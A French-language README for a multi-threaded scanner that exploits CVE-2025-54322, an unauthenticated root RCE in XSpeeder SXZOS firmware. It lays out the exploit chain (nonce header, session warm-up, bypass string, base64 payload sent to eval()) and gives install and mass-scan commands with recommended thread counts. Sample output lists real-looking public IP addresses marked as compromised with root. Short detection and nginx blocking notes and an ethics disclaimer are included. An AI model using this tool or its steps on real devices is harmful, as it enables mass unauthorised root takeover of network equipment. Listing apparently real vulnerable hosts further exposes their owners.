
CVE-2025-54322 - XSpeeder SXZOS Pre-Auth RCE 0day Finder Quick
Un scanner de vulnérabilité multi-threadé pour CVE-2025-54322, une vulnérabilité d'exécution de code à distance non authentifiée dans le firmware XSpeeder SXZOS affectant environ 70 000+ hôtes dans le monde.
CVE-2025-54322 est une vulnérabilité critique d'exécution de code à distance avant authentification découverte dans le firmware XSpeeder SXZOS, qui alimente les appareils SD-WAN, les routeurs et les équipements de périphérie réseau.
La vulnérabilité existe dans l'interface web basée sur Django du firmware SXZOS :
/?title=ABC&oIp=XXX&chkid=[payload_base64]eval() de Python sur une entrée utilisateur décodée en base641. Calculer un nonce basé sur le temps pour l'en-tête X-SXZ-R
2. Chauffer la session via le point de terminaison /webInfos/
3. Façonner une charge utile malveillante avec une chaîne de contournement (#sUserCodexsPwd)
4. Encoder la charge utile en base64
5. Envoyer l'exploit avec exactement 3 paramètres de requête
6. Le serveur décode et évalue la charge utile
7. Les commandes s'exécutent avec les privilèges root
L'exploit contourne plusieurs couches de défense :
SXZ/2.3X-SXZ-R : [0-6]/webInfos/#sUserCodexsPwdvuln-confirm.txt immédiatement# Cloner le dépôt
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# Installer les dépendances requises
pip install -r requirements.txt
Créez un fichier requirements.txt :
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# Scanner avec un nombre de threads personnalisé (par défaut : 10)
python3 scanner.py targets.txt 20
# Scanner avec un maximum de threads pour des résultats plus rapides
python3 scanner.py targets.txt 50
# Scanner avec un nombre de threads conservateur
python3 scanner.py targets.txt 5
Créez un fichier targets.txt avec une cible par ligne :
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) Scanner RCE ║
║ Vérificateur de vulnérabilité RCE Root avant authentification ║
║ Affichage : HÔTES VULNÉRABLES UNIQUEMENT ║
╚═══════════════════════════════════════════════════════════════╝
[*] 2338 cibles chargées depuis targets.txt
[*] Utilisation de 20 threads simultanés
[*] Les hôtes vulnérables seront sauvegardés dans : vuln-confirm.txt
[*] Début du scan...
======================================================================
[+] VULNÉRABLE : https://27.40.80.93:4433
[+] Statut : VULNÉRABLE - RCE Confirmé
[+] Statut HTTP : 500
[+] Sortie : uid=0(root) gid=0(root)
======================================================================
[*] Progression : 50/2338 | Trouvé : 12 vulnérables
[*] Progression : 100/2338 | Trouvé : 24 vulnérables
======================================================================
[*] SCAN TERMINÉ
======================================================================
[*] Temps total : 890.45 secondes
[*] Total des cibles scannées : 2338
[*] Hôtes vulnérables trouvés : 156
[*] Taux de succès : 6.67%
======================================================================
Le scanner affiche :
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - Hôtes vulnérables
Scan démarré : 2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
Statut : VULNÉRABLE - RCE Confirmé
Sortie : uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Statut : VULNÉRABLE - RCE Confirmé
Sortie : uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
Scan terminé : 2025-12-27 15:45:30
Total scanné : 2338
Vulnérables : 156
Temps écoulé : 890.45 secondes
Cet outil est fourni à des fins éducatives et de test de sécurité autorisé uniquement.
Si vous découvrez des systèmes vulnérables :
Si vous gérez des appareils XSpeeder SXZOS :
Recherchez ces indicateurs dans les journaux :
/?title=*&oIp=*&chkid=* avec des charges utiles base64SXZ/2.3X-SXZ-R inhabituels#sUserCodexsPwd/webInfos/ suivies du chemin racine# Règle Nginx pour bloquer les tentatives d'exploitation
location / {
if ($args ~* "chkid=") {
return 403;
}
}
Cette vulnérabilité a été découverte de manière autonome par pwn.ai - une plateforme de recherche en sécurité alimentée par l'IA.
Remarque importante : Il s'agit du premier zero-day RCE exploitable à distance découvert par un agent et documenté publiquement.
Chirag Artani
Cette implémentation de scanner a été créée pour aider les professionnels de la sécurité à :
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Les contributions sont les bienvenues ! N'hésitez pas à soumettre une Pull Request.
Pour des questions, problèmes ou suggestions :
Souvenez-vous : Un grand pouvoir implique de grandes responsabilités. Utilisez cet outil de manière éthique et légale.
Restez en sécurité. Restez éthique. Restez légal.
| Nombre de cibles | Threads recommandés | Temps estimé |
|---|
| 1-10 | 5 threads | ~1-2 min |
| 10-50 | 10 threads | ~3-5 min |
| 50-100 | 20 threads | ~5-10 min |
| 100-500 | 30 threads | ~10-20 min |
| 500+ | 40-50 threads | ~20+ min |